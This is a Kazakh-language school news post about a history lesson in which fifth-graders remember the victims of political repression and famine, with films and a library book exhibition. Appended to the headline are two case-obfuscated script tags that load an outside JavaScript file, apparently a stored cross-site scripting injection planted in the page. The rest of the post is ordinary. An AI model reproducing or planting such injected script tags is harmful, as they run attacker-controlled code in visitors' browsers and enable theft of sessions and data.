«Тарихымыздың ұрпақ ұмытпайтын тағылымы» тақырыбында танымдық сабақ өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.06.2022
31-ші мамыр күні «Тарихымыздың ұрпақ ұмытпайтын  тағылымы» тақырыбында оқушылар арасында  мектеп кітапханасында тарих пәні мұғалімдері  танымдық сабақ өткізді. Сабақтың мақсаты: Азаттық  жолында  және ашаршылық қасыретінен, құрбан болған бабаларымызды еске алу, рухына тағзым ету. Өнегелі іс арқылы өскелең ұрпақтың санасына, бойына отансүйгіштік, елжандылық қасиеттерді сіңіру. 
Сабақ барысында оқушыларға саяси қуғын-сүргін құрбандары туралы деректі фильмдер көрсетілді, кітапханашы А.Аубакированың ұйымдастыруымен кітапкөрмесі жасақталып, оқушыларға таныстырылды.
Тарихшы мұғалімдер өткізген іс-шарасына 5 сынып оқушылары қатысып, өздерінің ойларын ортаға салып, тарихи тұлғаларға қатысты пікірлерін жеткізді. Оқушылар тақырыпқа қатысты сұрақтар қойып, белсенділік танытты.
Просмотров: 798


Пікір қосу



Деректерді қолтаңбаға қосу